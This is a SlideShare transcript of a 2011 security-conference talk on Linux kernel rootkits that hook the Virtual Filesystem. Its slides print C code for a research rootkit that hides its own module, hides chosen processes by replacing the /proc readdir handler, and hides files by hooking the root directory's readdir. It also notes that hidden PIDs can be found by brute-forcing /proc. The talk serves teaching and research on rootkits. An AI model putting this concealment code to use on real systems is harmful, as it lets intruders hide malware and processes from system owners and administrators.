SlideShare une entreprise Scribd logo

Confraria SECURITY & IT - Lisbon Set 29, 2011

R
ricardomcm
Technologie
1  sur  22
Télécharger pour lire hors ligne
Linux rootkits without syscall patching, (the VFS way) Confraria SECURITY & IT – 28 Set 2011
#> whoami §  Ricardo Mourato – 25 yo §  Computer Science Degree §  InfoSec & SuperBock Stout addicted §  OS X, Slackware, FreeBSD, OpenBSD, Solaris fanatic §  Java, .Net, Python, Ruby, C, C++, ASM Lover §  Windows (All versions) , Perl (All versions) and Printers (Yes, they came from hell !) hater §  root, right here :) 2
Agenda §  Linux rootkits – brief talk §  Linux 2.{5,6} kernel – what changed ? §  The Virtual Filesystem (VFS) §  Meet /proc, our friend! §  Introducing §  Show time J §  Retrospect §  Questions & Answers 3
Linux rootkits – how they were? §  In the beginning… §  User-land Trojaned binaries mostly §  Easy to spot §  Easy to code §  However, hard to hide! §  LRK5 was a good bastard… 4
Linux rootkits – how they were? §  Not so far away… §  The Kernel-land approach §  Loadable Kernel Modules or /dev/kmem “patching” §  Syscall patching §  Easy to code §  Less easy to find Adore & suckit were also good bastards! 5
Linux rootkits – how they were? extern void *sys_call_table[]; int init_module(void) { original_call = sys_call_table[__NR_open]; sys_call_table[__NR_open] = evil_open; return 0; } 6
Linux 2.{5,6} – what changed? §  Main change: §  OMG! sys_call_table[] no longer exported!!! §  Even if you find it, it will be read-only §  Workaround: §  Find IDT §  Find the 0x80 interrupt §  Get the system_call() function location §  Use gdb kung fu and search memory for sys_call_table[] within this function 7
Linux 2.{5,6} – what changed? $ gdb -q /usr/src/linux/vmlinux (no debugging symbols found)...(gdb) disass system_call … 0xc0106bf4 : call *0xc01e0f18(,%eax,4) … (gdb) print &sys_call_table $1 = ( *) 0xc01e0f18 8
The Virtal Filesystem §  Is the primary interface to underlying filesystems (common file model) §  Exports a set of interfaces for every individual filesystem §  Each filesystem must “implement” this interface in order to become a common file model §  Some interesting players are: §  struct dentry; §  struct file_operations; §  struct inode_operations; 9
/proc is our friend §  So… everything in linux “is a file” right? §  Including the ones located at /proc even if “in memory” §  And… most user-land tools rely on /proc to get information! §  This tools include: §  ps §  netstat §  top §  mount §  And many, many others… §  Remember struct file_operations ? J 10
Introducing Fuckit… §  Fu Control Kit (just in case!) §  A research born VFS rootkit capable of: §  Hide itself ß No sh*t sherlock? §  Hide processes §  Hide files and directories §  TTY sniffing 11
Module hiding §  Modules are linked together in a double link list maintained by the kernel §  The kernel have internal functions to “unlink” the unloaded modules from the list §  Just use them wisely J 12
Module hiding static struct module *m = THIS_MODULE; void hideme(void){ kobject_del(&m->mkobj.kobj); list_del(&m->list); } 13
“Hook” the Virtual Filesystem (/proc) static struct file_operations *proc_fops; ß remember again? J void hook_proc(void){ /* we are not /proc yet */ key = create_proc_entry(KEY,0666,NULL); /* now we become /proc :) */ proc = key->parent; /* save the original, we will need it later*/ proc_fops = (struct file_operations *)proc->proc_fops; original_proc_readdir = proc_fops->readdir; /* tha hook */ proc_fops->readdir = fuckit_proc_readdir; } 14
“Hook” the Virtual Filesystem (/) static struct file *f; int hook_root(void){ f = filp_open("/",O_RDONLY,0600); if(IS_ERR(f)){ return -1; } original_root_readdir = f->f_op->readdir; f->f_op->readdir=fuckit_root_readdir; filp_close(f,NULL); return 0; } 15
Process hiding static inline int fuckit_proc_filldir(void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type){ //our hidden PID :) if(!strcmp(name,HIDDEN_PID) || !strcmp(name,KEY)){ return 0; } return original_filldir(__buf,name,namelen,offset,ino,d_type); } static inline int fuckit_proc_readdir(struct file *filp, void *dirent, filldir_t filldir){ //save this, we will need to return it later original_filldir = filldir; return original_proc_readdir(filp,dirent,fuckit_proc_filldir); } 16
File and Directory hiding static int fuckit_root_filldir(void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type){ //if is our hidden file/directory return nothing! :) if(strncmp(name,HIDDEN_DIR,namelen)==0){ return 0; } return original_root_filldir(__buf,name,namelen,offset,ino,d_type); } static int fuckit_root_readdir(struct file *filp, void *dirent, filldir_t filldir){ //save this, we will need to return it later original_root_filldir = filldir; return original_root_readdir(filp,dirent,fuckit_root_filldir); } 17
Seeing is believing 18
Retrospect §  Syscall patching in 2.6 kernel is a true “pain in the a**” §  VFS hooks, they also do the job! §  It is a good approach, however it has some cons §  It is possible to “brute force” /proc for hidden pids §  You should let the Linux scheduler do this job! §  Hypervisor rootkits will kill -9 every kernel rookits on earth! J 19
References §  IBM developerWorks “Anatomy of the Linux filesystem”. Internet: http://www.ibm.com/developerworks/linux/library/l-linux-filesystem/. [Jan 25, 2011] §  WangYao “Rootkit on Linux x86 v2.6” [Apr 21, 2009] §  Dump “hideme (ng)”. Internet: http://trace.dump.cz/projects.php [Jan 25, 2011] §  Ubra “Process Hiding & The Linux scheduler”. Internet: http://www.phrack.org/issues.html?issue=63&id=18 [Jan 25, 2011] 20
21
Questions & Answers ? 22

Recommandé

Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011ricardomcm
 
ch8-pv1-the-virtual-filesystem
ch8-pv1-the-virtual-filesystemch8-pv1-the-virtual-filesystem
ch8-pv1-the-virtual-filesystemyushiang fu
 
Sysprog17
Sysprog17Sysprog17
Sysprog17Ahmed Mekkawy
 
Python & FUSE
Python & FUSEPython & FUSE
Python & FUSEJoseph Scott
 
Gregor modules
Gregor modulesGregor modules
Gregor modulesskyshaw
 
Lecture 6 Kernel Debugging + Ports Development
Lecture 6 Kernel Debugging + Ports DevelopmentLecture 6 Kernel Debugging + Ports Development
Lecture 6 Kernel Debugging + Ports DevelopmentMohammed Farrag
 
Linux Command Line
Linux Command LineLinux Command Line
Linux Command LinePrima Yogi Loviniltra
 
FFMPEG on android
FFMPEG on androidFFMPEG on android
FFMPEG on androidYoss Cohen
 

Recommandé

Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011ricardomcm
 
ch8-pv1-the-virtual-filesystem
ch8-pv1-the-virtual-filesystemch8-pv1-the-virtual-filesystem
ch8-pv1-the-virtual-filesystemyushiang fu
 
Sysprog17
Sysprog17Sysprog17
Sysprog17Ahmed Mekkawy
 
Python & FUSE
Python & FUSEPython & FUSE
Python & FUSEJoseph Scott
 
Gregor modules
Gregor modulesGregor modules
Gregor modulesskyshaw
 
Lecture 6 Kernel Debugging + Ports Development
Lecture 6 Kernel Debugging + Ports DevelopmentLecture 6 Kernel Debugging + Ports Development
Lecture 6 Kernel Debugging + Ports DevelopmentMohammed Farrag
 
Linux Command Line
Linux Command LineLinux Command Line
Linux Command LinePrima Yogi Loviniltra
 
FFMPEG on android
FFMPEG on androidFFMPEG on android
FFMPEG on androidYoss Cohen
 
NUMOSS 4th Week - Commandline Tutorial
NUMOSS 4th Week - Commandline TutorialNUMOSS 4th Week - Commandline Tutorial
NUMOSS 4th Week - Commandline TutorialGagah Arifianto
 
Writing flexible filesystems in FUSE-Python
Writing flexible filesystems in FUSE-PythonWriting flexible filesystems in FUSE-Python
Writing flexible filesystems in FUSE-PythonAnurag Patel
 
コンテナ仮想、その裏側 〜user namespaceとrootlessコンテナ〜
コンテナ仮想、その裏側 〜user namespaceとrootlessコンテナ〜コンテナ仮想、その裏側 〜user namespaceとrootlessコンテナ〜
コンテナ仮想、その裏側 〜user namespaceとrootlessコンテナ〜Retrieva inc.
 
A.I. Exercise.
A.I. Exercise.A.I. Exercise.
A.I. Exercise.Mario Cho
 
Gdc09 Minimissile
Gdc09 MinimissileGdc09 Minimissile
Gdc09 MinimissileSusan Gold
 
Kernel entrance to-geek-
Kernel entrance to-geek-Kernel entrance to-geek-
Kernel entrance to-geek-mao999
 
gitfs
gitfsgitfs
gitfsTemian Vlad
 
Light my-fuse
Light my-fuseLight my-fuse
Light my-fuseWorkhorse Computing
 
Embedded Linux Odp
Embedded Linux OdpEmbedded Linux Odp
Embedded Linux Odpghessler
 
An (abridged) Ruby Plumber's Guide to *nix
An (abridged) Ruby Plumber's Guide to *nixAn (abridged) Ruby Plumber's Guide to *nix
An (abridged) Ruby Plumber's Guide to *nixEleanor McHugh
 
4.3 control mounting and unmounting of filesystems v2
4.3 control mounting and unmounting of filesystems v24.3 control mounting and unmounting of filesystems v2
4.3 control mounting and unmounting of filesystems v2Acácio Oliveira
 
SDE TP 4 - Processus
SDE TP 4 - ProcessusSDE TP 4 - Processus
SDE TP 4 - ProcessusAlexandru Radovici
 
Chroot Protection and Breaking
Chroot Protection and BreakingChroot Protection and Breaking
Chroot Protection and BreakingAnton Chuvakin
 
Docker e postgresql
Docker e postgresqlDocker e postgresql
Docker e postgresqlFernando Ike
 
How to make multi-boot USB drive for LiveCD iso images on EFI/UEFI and BIOS
How to make multi-boot USB drive for LiveCD iso images on EFI/UEFI and BIOS How to make multi-boot USB drive for LiveCD iso images on EFI/UEFI and BIOS
How to make multi-boot USB drive for LiveCD iso images on EFI/UEFI and BIOSKentaro Hatori
 
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012DefCamp
 
"Развитие ветки PHP-7"
"Развитие ветки PHP-7""Развитие ветки PHP-7"
"Развитие ветки PHP-7"Badoo Development
 
MongoDB shell games: Here be dragons .. and JavaScript!
MongoDB shell games: Here be dragons .. and JavaScript!MongoDB shell games: Here be dragons .. and JavaScript!
MongoDB shell games: Here be dragons .. and JavaScript!Stennie Steneker
 
Lets make better scripts
Lets make better scriptsLets make better scripts
Lets make better scriptsMichael Boelen
 
Development and practical use of CLI in perl 6
Development and practical use of CLI in perl 6Development and practical use of CLI in perl 6
Development and practical use of CLI in perl 6risou
 
Linux
LinuxLinux
Linuxkeydak11
 
Char Drivers And Debugging Techniques
Char Drivers And Debugging TechniquesChar Drivers And Debugging Techniques
Char Drivers And Debugging TechniquesYourHelper1
 

Contenu connexe

Tendances

NUMOSS 4th Week - Commandline Tutorial
NUMOSS 4th Week - Commandline TutorialNUMOSS 4th Week - Commandline Tutorial
NUMOSS 4th Week - Commandline TutorialGagah Arifianto
 
Writing flexible filesystems in FUSE-Python
Writing flexible filesystems in FUSE-PythonWriting flexible filesystems in FUSE-Python
Writing flexible filesystems in FUSE-PythonAnurag Patel
 
コンテナ仮想、その裏側 〜user namespaceとrootlessコンテナ〜
コンテナ仮想、その裏側 〜user namespaceとrootlessコンテナ〜コンテナ仮想、その裏側 〜user namespaceとrootlessコンテナ〜
コンテナ仮想、その裏側 〜user namespaceとrootlessコンテナ〜Retrieva inc.
 
A.I. Exercise.
A.I. Exercise.A.I. Exercise.
A.I. Exercise.Mario Cho
 
Gdc09 Minimissile
Gdc09 MinimissileGdc09 Minimissile
Gdc09 MinimissileSusan Gold
 
Kernel entrance to-geek-
Kernel entrance to-geek-Kernel entrance to-geek-
Kernel entrance to-geek-mao999
 
Embedded Linux Odp
Embedded Linux OdpEmbedded Linux Odp
Embedded Linux Odpghessler
 
An (abridged) Ruby Plumber's Guide to *nix
An (abridged) Ruby Plumber's Guide to *nixAn (abridged) Ruby Plumber's Guide to *nix
An (abridged) Ruby Plumber's Guide to *nixEleanor McHugh
 
4.3 control mounting and unmounting of filesystems v2
4.3 control mounting and unmounting of filesystems v24.3 control mounting and unmounting of filesystems v2
4.3 control mounting and unmounting of filesystems v2Acácio Oliveira
 
Chroot Protection and Breaking
Chroot Protection and BreakingChroot Protection and Breaking
Chroot Protection and BreakingAnton Chuvakin
 
Docker e postgresql
Docker e postgresqlDocker e postgresql
Docker e postgresqlFernando Ike
 
How to make multi-boot USB drive for LiveCD iso images on EFI/UEFI and BIOS
How to make multi-boot USB drive for LiveCD iso images on EFI/UEFI and BIOS How to make multi-boot USB drive for LiveCD iso images on EFI/UEFI and BIOS
How to make multi-boot USB drive for LiveCD iso images on EFI/UEFI and BIOSKentaro Hatori
 
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012DefCamp
 
"Развитие ветки PHP-7"
"Развитие ветки PHP-7""Развитие ветки PHP-7"
"Развитие ветки PHP-7"Badoo Development
 
MongoDB shell games: Here be dragons .. and JavaScript!
MongoDB shell games: Here be dragons .. and JavaScript!MongoDB shell games: Here be dragons .. and JavaScript!
MongoDB shell games: Here be dragons .. and JavaScript!Stennie Steneker
 
Lets make better scripts
Lets make better scriptsLets make better scripts
Lets make better scriptsMichael Boelen
 
Development and practical use of CLI in perl 6
Development and practical use of CLI in perl 6Development and practical use of CLI in perl 6
Development and practical use of CLI in perl 6risou
 

Tendances (20)

NUMOSS 4th Week - Commandline Tutorial
NUMOSS 4th Week - Commandline TutorialNUMOSS 4th Week - Commandline Tutorial
NUMOSS 4th Week - Commandline Tutorial
 
Writing flexible filesystems in FUSE-Python
Writing flexible filesystems in FUSE-PythonWriting flexible filesystems in FUSE-Python
Writing flexible filesystems in FUSE-Python
 
コンテナ仮想、その裏側 〜user namespaceとrootlessコンテナ〜
コンテナ仮想、その裏側 〜user namespaceとrootlessコンテナ〜コンテナ仮想、その裏側 〜user namespaceとrootlessコンテナ〜
コンテナ仮想、その裏側 〜user namespaceとrootlessコンテナ〜
 
A.I. Exercise.
A.I. Exercise.A.I. Exercise.
A.I. Exercise.
 
Gdc09 Minimissile
Gdc09 MinimissileGdc09 Minimissile
Gdc09 Minimissile
 
Kernel entrance to-geek-
Kernel entrance to-geek-Kernel entrance to-geek-
Kernel entrance to-geek-
 
gitfs
gitfsgitfs
gitfs
 
Light my-fuse
Light my-fuseLight my-fuse
Light my-fuse
 
Embedded Linux Odp
Embedded Linux OdpEmbedded Linux Odp
Embedded Linux Odp
 
An (abridged) Ruby Plumber's Guide to *nix
An (abridged) Ruby Plumber's Guide to *nixAn (abridged) Ruby Plumber's Guide to *nix
An (abridged) Ruby Plumber's Guide to *nix
 
4.3 control mounting and unmounting of filesystems v2
4.3 control mounting and unmounting of filesystems v24.3 control mounting and unmounting of filesystems v2
4.3 control mounting and unmounting of filesystems v2
 
SDE TP 4 - Processus
SDE TP 4 - ProcessusSDE TP 4 - Processus
SDE TP 4 - Processus
 
Chroot Protection and Breaking
Chroot Protection and BreakingChroot Protection and Breaking
Chroot Protection and Breaking
 
Docker e postgresql
Docker e postgresqlDocker e postgresql
Docker e postgresql
 
How to make multi-boot USB drive for LiveCD iso images on EFI/UEFI and BIOS
How to make multi-boot USB drive for LiveCD iso images on EFI/UEFI and BIOS How to make multi-boot USB drive for LiveCD iso images on EFI/UEFI and BIOS
How to make multi-boot USB drive for LiveCD iso images on EFI/UEFI and BIOS
 
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
 
"Развитие ветки PHP-7"
"Развитие ветки PHP-7""Развитие ветки PHP-7"
"Развитие ветки PHP-7"
 
MongoDB shell games: Here be dragons .. and JavaScript!
MongoDB shell games: Here be dragons .. and JavaScript!MongoDB shell games: Here be dragons .. and JavaScript!
MongoDB shell games: Here be dragons .. and JavaScript!
 
Lets make better scripts
Lets make better scriptsLets make better scripts
Lets make better scripts
 
Development and practical use of CLI in perl 6
Development and practical use of CLI in perl 6Development and practical use of CLI in perl 6
Development and practical use of CLI in perl 6
 

Similaire à Confraria SECURITY & IT - Lisbon Set 29, 2011

Char Drivers And Debugging Techniques
Char Drivers And Debugging TechniquesChar Drivers And Debugging Techniques
Char Drivers And Debugging TechniquesYourHelper1
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - RoutersLogicaltrust pl
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersFilip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersYury Chemerkin
 
Java Hates Linux. Deal With It.
Java Hates Linux. Deal With It.Java Hates Linux. Deal With It.
Java Hates Linux. Deal With It.Greg Banks
 
Writing Character driver (loadable module) in linux
Writing Character driver (loadable module) in linuxWriting Character driver (loadable module) in linux
Writing Character driver (loadable module) in linuxRajKumar Rampelli
 
[Kiwicon 2011] Post Memory Corruption Memory Analysis
[Kiwicon 2011] Post Memory Corruption Memory Analysis[Kiwicon 2011] Post Memory Corruption Memory Analysis
[Kiwicon 2011] Post Memory Corruption Memory AnalysisMoabi.com
 
FreeBSD Jail Complete Example
FreeBSD Jail Complete ExampleFreeBSD Jail Complete Example
FreeBSD Jail Complete ExampleMohammed Farrag
 
[HITB Malaysia 2011] Exploit Automation
[HITB Malaysia 2011] Exploit Automation[HITB Malaysia 2011] Exploit Automation
[HITB Malaysia 2011] Exploit AutomationMoabi.com
 
FreeBSD and Drivers
FreeBSD and DriversFreeBSD and Drivers
FreeBSD and DriversKernel TLV
 
[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory AnalysisMoabi.com
 
Unix Programming with Perl
Unix Programming with PerlUnix Programming with Perl
Unix Programming with PerlKazuho Oku
 
Exploitation of counter overflows in the Linux kernel
Exploitation of counter overflows in the Linux kernelExploitation of counter overflows in the Linux kernel
Exploitation of counter overflows in the Linux kernelVitaly Nikolenko
 
MINCS - containers in the shell script (Eng. ver.)
MINCS - containers in the shell script (Eng. ver.)MINCS - containers in the shell script (Eng. ver.)
MINCS - containers in the shell script (Eng. ver.)Masami Hiramatsu
 
55 new things in Java 7 - Devoxx France
55 new things in Java 7 - Devoxx France55 new things in Java 7 - Devoxx France
55 new things in Java 7 - Devoxx FranceDavid Delabassee
 
Unix Shell Scripting
Unix Shell ScriptingUnix Shell Scripting
Unix Shell ScriptingMustafa Qasim
 

Similaire à Confraria SECURITY & IT - Lisbon Set 29, 2011 (20)

Linux
LinuxLinux
Linux
 
Char Drivers And Debugging Techniques
Char Drivers And Debugging TechniquesChar Drivers And Debugging Techniques
Char Drivers And Debugging Techniques
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersFilip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routers
 
Java Hates Linux. Deal With It.
Java Hates Linux. Deal With It.Java Hates Linux. Deal With It.
Java Hates Linux. Deal With It.
 
Writing Character driver (loadable module) in linux
Writing Character driver (loadable module) in linuxWriting Character driver (loadable module) in linux
Writing Character driver (loadable module) in linux
 
[Kiwicon 2011] Post Memory Corruption Memory Analysis
[Kiwicon 2011] Post Memory Corruption Memory Analysis[Kiwicon 2011] Post Memory Corruption Memory Analysis
[Kiwicon 2011] Post Memory Corruption Memory Analysis
 
FreeBSD Portscamp, Kuala Lumpur 2016
FreeBSD Portscamp, Kuala Lumpur 2016FreeBSD Portscamp, Kuala Lumpur 2016
FreeBSD Portscamp, Kuala Lumpur 2016
 
FreeBSD Jail Complete Example
FreeBSD Jail Complete ExampleFreeBSD Jail Complete Example
FreeBSD Jail Complete Example
 
[HITB Malaysia 2011] Exploit Automation
[HITB Malaysia 2011] Exploit Automation[HITB Malaysia 2011] Exploit Automation
[HITB Malaysia 2011] Exploit Automation
 
Linux device drivers
Linux device drivers Linux device drivers
Linux device drivers
 
FreeBSD and Drivers
FreeBSD and DriversFreeBSD and Drivers
FreeBSD and Drivers
 
[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis
 
Unix Programming with Perl
Unix Programming with PerlUnix Programming with Perl
Unix Programming with Perl
 
Exploitation of counter overflows in the Linux kernel
Exploitation of counter overflows in the Linux kernelExploitation of counter overflows in the Linux kernel
Exploitation of counter overflows in the Linux kernel
 
MINCS - containers in the shell script (Eng. ver.)
MINCS - containers in the shell script (Eng. ver.)MINCS - containers in the shell script (Eng. ver.)
MINCS - containers in the shell script (Eng. ver.)
 
55 new things in Java 7 - Devoxx France
55 new things in Java 7 - Devoxx France55 new things in Java 7 - Devoxx France
55 new things in Java 7 - Devoxx France
 
osd - co1 session7.pptx
osd - co1 session7.pptxosd - co1 session7.pptx
osd - co1 session7.pptx
 
Unix Shell Scripting
Unix Shell ScriptingUnix Shell Scripting
Unix Shell Scripting
 
Docker
DockerDocker
Docker
 

Dernier

Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 

Dernier (20)

Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
08448380779 Call Girls In Civil Lines Women Seeking Men
